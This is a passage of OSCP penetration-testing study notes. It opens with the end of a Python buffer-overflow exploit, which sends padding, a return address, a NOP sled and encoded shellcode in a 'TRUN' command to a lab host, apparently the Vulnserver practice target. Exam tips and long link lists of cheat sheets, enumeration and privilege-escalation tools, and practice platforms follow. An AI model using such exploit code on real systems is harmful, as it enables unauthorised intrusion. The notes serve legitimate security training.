    "\x07\x4a\x5c\x2b\x81\xaf\x6d\x6b\xf5\xa4\xde\x5b\x7d\xe8\xd2"
    "\x10\xd3\x18\x60\x54\xfc\x2f\xc1\xd3\xda\x1e\xd2\x48\x1e\x01"
    "\x50\x93\x73\xe1\x69\x5c\x86\xe0\xae\x81\x6b\xb0\x67\xcd\xde"
    "\x24\x03\x9b\xe2\xcf\x5f\x0d\x63\x2c\x17\x2c\x42\xe3\x23\x77"
    "\x44\x02\xe7\x03\xcd\x1c\xe4\x2e\x87\x97\xde\xc5\x16\x71\x2f"
    "\x25\xb4\xbc\x9f\xd4\xc4\xf9\x18\x07\xb3\xf3\x5a\xba\xc4\xc0"
    "\x21\x60\x40\xd2\x82\xe3\xf2\x3e\x32\x27\x64\xb5\x38\x8c\xe2"
    "\x91\x5c\x13\x26\xaa\x59\x98\xc9\x7c\xe8\xda\xed\x58\xb0\xb9"
    "\x8c\xf9\x1c\x6f\xb0\x19\xff\xd0\x14\x52\x12\x04\x25\x39\x7b"
    "\xe9\x04\xc1\x7b\x65\x1e\xb2\x49\x2a\xb4\x5c\xe2\xa3\x12\x9b"
    "\x05\x9e\xe3\x33\xf8\x21\x14\x1a\x3f\x75\x44\x34\x96\xf6\x0f"
    "\xc4\x17\x23\x9f\x94\xb7\x9c\x60\x44\x78\x4d\x09\x8e\x77\xb2"
    "\x29\xb1\x5d\xdb\xc0\x48\x36\xee\x14\x52\x94\x86\x16\x52\x09"
    "\x0b\x9e\xb4\x43\xa3\xf6\x6f\xfc\x5a\x53\xfb\x9d\xa3\x49\x86"
    "\x9e\x28\x7e\x77\x50\xd9\x0b\x6b\x05\x29\x46\xd1\x80\x36\x7c"
    "\x7d\x4e\xa4\x1b\x7d\x19\xd5\xb3\x2a\x4e\x2b\xca\xbe\x62\x12"
    "\x64\xdc\x7e\xc2\x4f\x64\xa5\x37\x51\x65\x28\x03\x75\x75\xf4"
    "\x8c\x31\x21\xa8\xda\xef\x9f\x0e\xb5\x41\x49\xd9\x6a\x08\x1d"
    "\x9c\x40\x8b\x5b\xa1\x8c\x7d\x83\x10\x79\x38\xbc\x9d\xed\xcc"
    "\xc5\xc3\x8d\x33\x1c\x40\xad\xd1\xb4\xbd\x46\x4c\x5d\x7c\x0b"
    "\x6f\x88\x43\x32\xec\x38\x3c\xc1\xec\x49\x39\x8d\xaa\xa2\x33"
    "\x9e\x5e\xc4\xe0\x9f\x4a")

shellcode = 'A' * 2003 + "\xaf\x11\x50\x62" + '\x90' * 32 + overflow

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.0.0.71', 9999))
    s.send('TRUN /.:/' + shellcode)
    s.close()
except:
    print('Error connecting to server')
    sys.exit()
Binary
Linux BOF :
SLmail
ftpfreefloat
minishare
Ftpfreefloat
Tools :
Misc
SSH Permissions
Msfvenom
MSF Venom Payloads
PHP
Linux Elf
Tips
Preparation Tips :
You'll run out of techniques before time runs out. So learn as many techniques as possible, so that you always have an alternate option if something fails to produce output.
Try harder doesn’t mean you have to try the same exploit with 200x thread count or with
an angry face. Go, enumerate harder.
Exam Tips :
Bruh you have unlimited breaks, use it. You aren’t writing your semester exam.
24 reverts are plenty enough already. Go use it.
Caffeine is a must.
You’re not gonna pentest a real-world machine. You’re gonna try to hack into an
intentionally vulnerable machine that is vulnerable to a specific exploit. Exploiting it
right in 24 hours is your only goal. So, OSCP is actually a lot easier than real-world
machines where you don’t know if the machine is vulnerable or not.
ippsec.rocks is a good resource to use if you need help in exploiting a specific service
Scan ports, scan all the ports, scan using different scanning techniques.
Brute force web dirs, brute force web dirs using different wordlists and tools.
Check for file permissions, check for registry entries, check for writable folders, check for privileged processes and services, check for interesting files.
Look for a more suitable exploit using searchsploit, search Google for valuable information, etc.
Note the webserver version, web app version, CMS version and plugin versions.
Password reuse
The default password of the application / CMS
Guess the file location incase of LFI with username
username from any notes inside the machine might be useful for Bruteforce
Resources
OSCP Journeys and Preparation guides:
https://medium.com/@parthdeshani/how-to-pass-oscp-like-boss-b269f2ea99d
https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html
https://medium.com/@calmhavoc/oscp-the-pain-the-pleasure-a506962baad
https://github.com/burntmybagel/OSCP-Prep
https://medium.com/@m4lv0id/and-i-did-oscp-589babbfea19
https://gr0sabi.github.io/security/oscp-insights-best-practices-resources/#note-taking
https://satiex.net/2019/04/10/offensive-security-certified-professional/amp/?__twitter_impression=true
https://hakin9.org/try-harder-my-penetration-testing-with-kali-linux-oscp-review-and-courselab-experience-my-oscp-review-by-jason-bernier/
https://theslickgeek.com/oscp/
http://dann.com.br/oscp-offensive-security-certification-pwk-course-review/
https://h0mbre.github.io/OSCP/#
https://prasannakumar.in/infosec/my-walk-towards-cracking-oscp/
https://infosecuritygeek.com/my-oscp-journey/
https://acknak.fr/en/articles/oscp-tools/
https://r3dg33k.com/2018-10-09-oscp-exp/
https://www.jimwilbur.com/oscp-links/
https://www.linkedin.com/pulse/road-oscp-oluwaseun-oyelude-oscp
https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html
https://blog.vonhewitt.com/2018/08/oscp-exam-cram-log-aug-sept-oct-2018/
https://jhalon.github.io/OSCP-Review/
https://www.alienvault.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp
https://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/
https://thor-sec.com/review/oscp/oscp_review/
Cheatsheets
OSCP Cheatsheets :
https://github.com/P3t3rp4rk3r/OSCP-cheat-sheet-1?files=1
https://github.com/crsftw/oscp?files=1
https://github.com/crsftw
https://h4ck.co/wp-content/uploads/2018/06/cheatsheet.txt
https://sushant747.gitbooks.io/total-oscp-guide/reverse-shell.html
https://jok3rsecurity.com/cheat-sheet/
https://github.com/UserXGnu/OSCP-cheat-sheet-1?files=1
https://archive.is/IZLjv
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/
http://ramunix.blogspot.com/2016/10/oscp-cheat-sheet.html?m=1
http://0xc0ffee.io/blog/OSCP-Goldmine
https://hausec.com/pentesting-cheatsheet/
https://jordanpotti.com/oscp/
https://github.com/ucki/URP-T-v.01?files=1
https://blog.propriacausa.de/wp-content/uploads/2016/07/oscp_notes.html
https://zsahi.wordpress.com/oscp-notes-collection/
https://github.com/weaknetlabs/Penetration-Testing-Grimoire?files=1
https://github.com/OlivierLaflamme/Cheatsheet-God?files=1
https://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad
Tools
Approved Tools List: https://falconspy.medium.com/unofficial-oscp-approved-tools-b2b4e889e707
Exploit search :
Searchsploit
Enumeration Tools :
https://github.com/Tib3rius/AutoRecon
https://bitbucket.org/xaeroborg/python3-programs/src
https://github.com/21y4d/nmapAutomator
Powershell:
EXE : (https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#exe)
WinPeas [ https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS ]
Accesschk.exe [ https://github.com/jivoi/pentest/blob/master/post_win/accesschk_exe ]
PowerUp (https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc)
Seatbelt (https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)
Note Taking
Practice
OSCP Like VMs:
Practice Arena:
CMD Challenge https://cmdchallenge.com
Try Hack Me https://tryhackme.com/
Hacking-Lab https://www.hacking-lab.com/index.html
PWNABLE https://pwnable.kr/play.php
Google CTF https://capturetheflag.withgoogle.com/
ImmersiveLabs https://immersivelabs.com/
Attack-Defense https://attackdefense.com/
OverTheWire http://overthewire.org
SANS Challenger https://www.holidayhackchallenge.com/
SmashTheStack http://smashthestack.org/wargames.html
https://microcorruption.com/login (Very good interactive interface, introduces low-level reverse engineering on an MSP430)
https://learn.abctf.xyz (New platform for learning CTF, with challenges created by the users themselves)
http://reversing.kr/
http://hax.tor.hu/
https://pwn0.com/
https://io.netgarage.org/
http://ringzer0team.com/
http://www.hellboundhackers.org/
http://counterhack.net/Counter_Hack/Challenges.html
http://www.hackthissite.org/
Others
https://backdoor.sdslabs.co/
http://hackthecause.info/
http://bright-shadows.net/
http://www.mod-x.co.uk/main.php
http://scanme.nmap.org/
http://www.hackertest.net/
http://net-force.nl/
http://securityoverride.org/ (Teaches good concepts, but some things are not realistic, like stored strings identical to the input)
http://demo.testfire.net/
http://wocares.com/xsstester.php
http://crackme.cenzic.com/
http://test.acunetix.com/
http://zero.webappsecurity.com/
http://computer-forensics.sans.org/community/challenges
http://forensicscontest.com/
Recruiting
https://www.praetorian.com/challenges/pwnable/
http://rtncyberjobs.com/
http://0x41414141.com/
Paid Training
http://heorot.net/
http://www.badstore.net/
http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
http://www.owasp.org/index.php/Owasp_SiteGenerator
http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
https://pentesterlab.com/exercises/
http://sourceforge.net/projects/metasploitable/files/Metasploitable2/